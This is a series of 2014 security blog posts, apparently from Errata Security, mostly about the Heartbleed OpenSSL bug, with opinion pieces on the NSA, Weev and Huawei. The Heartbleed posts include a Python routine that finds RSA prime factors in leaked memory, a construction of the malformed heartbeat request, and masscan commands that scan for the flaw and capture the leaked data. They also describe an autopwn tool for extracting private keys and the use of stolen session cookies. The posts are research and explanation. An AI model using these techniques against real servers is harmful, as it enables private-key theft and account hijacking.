Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two days trying to solve this problem; it was very frustrating.

The answer was "byte-order". I was looking for the prime factor in the same way that it'd appear in a DER-encoded file, which is "big-endian". Instead, the way to find the key is to look for it in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. An RSA key and its constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.
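The consequence for searching a dump is a sketch like the following (a toy illustration, not the actual heartleech code; the function name and the tiny 16-bit example primes are mine):

```python
# A toy sketch: search a memory dump for a prime factor of an RSA
# modulus n by interpreting each window of bytes as a LITTLE-endian
# integer -- the OpenSSL BIGNUM in-memory layout on x86 -- rather than
# the big-endian layout of a DER-encoded file.
def find_prime_factor(dump: bytes, n: int, prime_bytes: int):
    for i in range(len(dump) - prime_bytes + 1):
        candidate = int.from_bytes(dump[i:i + prime_bytes], "little")
        # Skip trivial values, then test divisibility against the modulus.
        if candidate > 1 and candidate != n and n % candidate == 0:
            return candidate
    return None

# Toy example: n = 65519 * 65521; the factor 65519 (0xFFEF) is hidden
# in the dump as the little-endian byte sequence EF FF.
dump = b"\x00\x12\xab" + (65519).to_bytes(2, "little") + b"\xff\x00"
print(find_prime_factor(dump, 65519 * 65521, 2))  # -> 65519
```

A real 2048-bit key has 128-byte prime factors, so `prime_bytes` would be 128 and the modular test is what makes a hit unambiguous.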

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudflarechallenge.com challenge using Python scripts. I therefore assumed that Python used an external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER-encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get its key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former military head Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but that they stay on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market are less than those caused by private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has crept to include surveilling American citizens. We need to stop making them the bogeyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue, not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for heartbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.
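Those raw bytes can be sketched in a few lines (a minimal illustration, not any particular scanner's code; it assumes TLS 1.1 framing and skips the handshake a real probe performs first):

```python
import struct

# The malformed heartbeat at the core of the bug: the TLS record
# carries only a 3-byte heartbeat message, but that message claims a
# 0x4000-byte payload, so a vulnerable server echoes back ~16KB of
# whatever memory happens to follow.
def evil_heartbeat() -> bytes:
    record = struct.pack("!BHH", 0x18, 0x0302, 3)  # type=24 (heartbeat), TLS 1.1, record length=3
    message = struct.pack("!BH", 0x01, 0x4000)     # type=1 (request), claimed payload length
    return record + message

print(evil_heartbeat().hex())  # -> 1803020003014000
```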

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same error messages might make it seem like they are correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are still not likely to be exposed, but they are much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of machines had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, and I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the entire Internet).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in response to the SYN-ACKs. Therefore, on Linux, you have to either configure firewall rules to block out a range of ports that masscan can use without generating resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100,000 packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability
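As a sanity check on that rate, the scan time follows from simple arithmetic (a back-of-the-envelope sketch; it ignores retransmits and the banner-grabbing phase):

```python
# How long one pass over a /8 takes at the rate given above.
addresses = 2 ** 24        # a /8 (Class A) holds 16,777,216 addresses
rate = 100_000             # packets/second, from --rate 100000
seconds = addresses / rate
print(seconds)             # ~168 seconds, i.e. under three minutes
```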


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that the SSL exists, that the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).
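Recovering the bled bytes from that output is straightforward (a hypothetical sketch; the line format is inferred from the example above, and the base64 payload here is made up for illustration):

```python
import base64
import re

# Parse one masscan "--capture heartbleed" banner line and decode the
# base64 payload back into the raw bytes bled from the server.
line = "Banner on port 443/tcp on 10.20.30.143: [heartbleed] aGVsbG8gd29ybGQ="
m = re.match(r"Banner on port (\d+)/tcp on (\S+): \[heartbleed\] (\S+)", line)
if m:
    port, ip, b64 = m.groups()
    leaked = base64.b64decode(b64)   # raw memory bled from the server
    print(ip, leaked)
```

The decoded bytes are what you'd then grep for cookies, passwords, or (per the post above) little-endian prime factors.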




What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, impacting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: the impact of disclosing the private-key affects all hundred million customers with a one-in-a-million likelihood, whereas the impact of a session-key disclosure affects only one customer, with a greater-than-50% chance per connection.




Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is that there were far fewer security problems, that we knew of, in 1995 than today. What is so different about today than 1995? One major difference is that SATAN, the controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema, is not as widely used.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Our first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...

Thursday, March 27, 2014

A traditional cybersecurity company

Picture of the loft, from Space Rogue.
This is the tradition.
In the prosecutors' response to the Weev appeal, they make the snarky claim about Goatse security:
It is not, to put it mildly, a traditional security research company. The firm’s name is a reference to a notoriously obscene internet shock site. ...  Goatse Security’s corporate motto is “gaping holes exposed.” 
They are wrong. This is traditional, at least for security research companies. We start out as hobbyists having fun, not taking what we do seriously. We start out wearing t-shirts and hoodies. Only as we grow older do we realize that people will pay serious money for this, and it becomes our formal job, where we might show up to meetings wearing a suit.

Wednesday, March 26, 2014

We may have witnessed an NSA "Shotgiant" TAO-like action

Last Friday, the New York Times reported that the NSA has hacked/infiltrated Huawei, a big Chinese network hardware firm. We may have witnessed something related to this.

In 2012, during an incident, we watched in real time as somebody logged into an account reserved for Huawei tech support, from the Huawei IP address space in mainland China. We watched as they executed a very narrow SQL query targeting specific data. That person then encrypted the results, emailed them to a Hotmail account, removed the log files, and logged out. Had we not been connected live to the system and watched it in real-time, there would have been no trace of the act.

The compelling attribute of the information they grabbed is that it was useful only to American intelligence. The narrowness of the SQL query clearly identified why they wanted the data. It wasn't support information, something that a support engineer would want. It wasn't indiscriminate information, something a hacker might grab. It wasn't something that would interest other intelligence services -- except to pass it on to the Americans.

I point this out to demonstrate the incompleteness of the New York Times story. The story takes the leaked document with the phrase "Leverage Huawei presence to gain access to networks of interest" and assumes it's referring to the existing narratives of "hardware backdoors" or "finding 0days". In fact, these documents can mean so much more, such as "exploiting support contracts".

A backdoor or 0day for a Huawei router would be of limited use to the NSA, because the control ports are behind firewalls. Hacking behind firewalls would likely give full access to the target network anyway, making any backdoors/0days in routers superfluous.

But embedding themselves inside the support infrastructure would give the NSA nearly unlimited access to much of the world. Huawei claims that a third of the Internet is running their devices. Almost all of it is under support contract. This means a Huawei support engineer, or a spy, can at any time reach out through cyberspace and take control of a third of the Internet hardware, located in data centers behind firewalls. Most often, it's the Huawei device or management server the NSA would target. In other cases, the Huawei product is just one hop away from the desired system, without a firewall in between.

You want to know who the Pakistani president called in the hours after the raid on the Bin Laden compound? Easy, just use the Huawei support account to query all the telephone switches. You want the contents of Bashar al-Assad's emails? Easy, just log into the Huawei management servers that share accounts with the email servers.

This isn't just a Huawei issue, but a universal principle of hacking. An example was last Christmas's breach of the retailer Target, where 40 million credit cards were stolen by hackers. Apparently, hackers first breached the HVAC (air conditioning) company, then leveraged its VPN connection to the Target network to hack into Target's servers.


By the way, I doubt this was actually the NSA. It's more likely the CIA, which has "assets" at Huawei (support engineers they've bribed), or the intelligence service of a friendly country. The intelligence community is so huge it'd be unreasonable to assume the NSA is lurking behind every rock. I'm just pointing out that there are other ways to interpret that NYTimes story.